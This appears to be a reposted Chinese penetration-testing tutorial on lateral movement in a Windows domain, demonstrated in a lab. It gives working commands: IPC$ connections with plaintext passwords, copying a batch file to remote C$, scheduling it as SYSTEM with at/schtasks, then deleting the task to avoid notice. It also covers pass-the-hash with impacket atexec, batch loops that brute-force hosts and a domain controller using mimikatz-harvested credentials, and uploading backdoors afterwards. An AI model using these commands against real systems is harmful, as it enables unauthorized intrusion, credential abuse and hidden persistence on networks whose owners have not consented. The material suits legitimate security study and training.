基础23-域横向批量at&schtasks命令

gclome

原文链接：基础23-域横向批量at&schtasks命令

​
内容目录前提简介案例1 [at] & [schtasks] 明文密码传递使用，系统命令案例2 横向渗透明文HASH传递，第三方工具atexec-impacket案例3 横向渗透明文HASH传递批量利用-简单脚本演示案例4 横向渗透明文HASH传递批量利用-升级版脚本使用

前提简介在拿下一台内网主机后，通过本地信息搜集收集用户凭证等信息后，如何横向渗透拿下更多的主机？
这里介绍 at&schtasks 命令的使用，在已知目标系统的用户明文密码的基础上，直接可以在远程主机上执行命令。

利用流程:

•         建立 IPC 链接到目标主机
  
•         拷贝要执行的命令脚本到目标主机
  
•         查看目标时间，创建计划任务（at、schtasks）定时执行拷贝到的脚本
  
•         删除 IPC 链接
  
  

IPC连接失败原因or使用前提：
（1）目标系统不是 NT 或以上的操作系统
（2）对方没有打开 IPC共享
（3）对方未开启 139、445 端口，或者被防火墙屏蔽
（4）输出命令、账号密码有错误
案例一[at] & [schtasks] 明文密码传递使用，系统命令

#at < Windows2012 时使用

1. net use \192.168.3.21\ipc "Admin12345" /user:god.org\ad ministrator
   
2. # 建立 ipc 连接：

复制代码

​

1. copy add.bat \192.168.3.21\c$
   
2. #拷贝执行文件到目标机器

复制代码

​

​

​

1. at \192.168.3.21 15:47 c:\add.bat
   
2. #添加计划任务

复制代码

​

​

# schtasks >=Windows2012时使用

1. net use \\192.168.3.32\ipc$ "admin!@#45" /user:god.org\ad ministrator
   
2. # 建立 ipc 连接

复制代码

​

​

​

1. copy add.bat \192.168.3.32\c$ #复制文件到其 C 盘

复制代码

​

​
​

• 
  

1.     schtasks /create /s 192.168.3.32 /ru "SYSTEM" /tn adduser /sc DAILY /tr c:\add.bat /F #创建 adduser 任务对应执行文件

复制代码

​

• 
  

1. schtasks /run /s 192.168.3.32 /tn adduser /i #运行 adduser 任务

复制代码

​

​

schtasks /delete /s 192.168.3.21 /tn adduser /f   #删除 adduser 任务，防止对方察觉优点：不用考虑免杀等问题
缺点：命令比较长，使用繁琐
案例2 横向渗透明文HASH传递，第三方工具atexec-impacket
工具项目地址：https://github.com/maaaaz/impacket-examples-windows使用：

1. 
   
2. atexec.exe ./administrator:Admin12345@192.168.3.21 "whoami"
   
3. atexec.exe god/administrator:Admin12345@192.168.3.21 "whoami"

复制代码

​

1. atexec.exe -hashes :ccef208c6485269c20db2cad21734fe7 ./administrator@192.168.3.21 "whoami"
   
2. 利用hash连接

复制代码

优点：使用方便
缺点：需要考虑免杀的问题。
​​
案例3 横向渗透明文HASH传递批量利用-简单脚本演示
假设已经拿下web域用户的权限，开始操作。
利用自带命令ping网段，获得存活主机ip。

​

192.168.41.2192.168.41.139192.168.41.141192.168.41.143再用刚刚mimikatz得到的账号密码代入下面脚本进行爆破。

1. FOR /F %%i in (ip.txt) do atexec.exe ./administrator:admin!@#45@%%i whoami

复制代码

​

脚本格式为bat，ip写在txt中即可

​

有返回就说明连接成功。
然后我们就可以将mimikatz再次上传到可登录的主机上，再次获取他电脑上的账号密码信息。
我们这边又得到了登录主机的账号密码，可以将密码再次放入我们的字典中去，再次跑。

​

​

拿得到的密码直接去攻击域控（当然你也可以将ip再换成循环变量)

1. FOR /F %%i in (pass.txt) do atexec.exe ./administrator:%%i@192.168.3.21 whoami

复制代码

​

域控登录成功。
但是这个只是靶场演示，实际中比这个更加繁琐。

总体流程：
得到webshell-->提权-->获取的主机的账号信息-->查询域内存活主机-->写脚本批量尝试连接域内其他主机-->连接成功后再使用mimikatz获取其他可连接主机的账号密码信息-->扩充字典-->最后成功连接到域控
当然hash同样也可以作为字典使用。
当然，这个小脚本的局限性比较大，难以满足我们在实战中的需求，所以我们需要对脚本进行改进。

案例4 横向渗透明文HASH传递批量利用-升级版脚本使用
用py编写后再打包编译成exe文件即可。

​

然后将你的账号密码ip等信息填入后进行编译。

• 
  

1. 将py编译成exe命令
   
2. pyinstaller -F fuck_neiwang_001.py

复制代码

​

再将exe文件上传到我们拿下的主机上运行即可。

​

成功连接到五台主机，再将后门呀这些上传上线就ok了。
当然也可以直接将所有命令集成化，先连接后上传，再执行等等。
​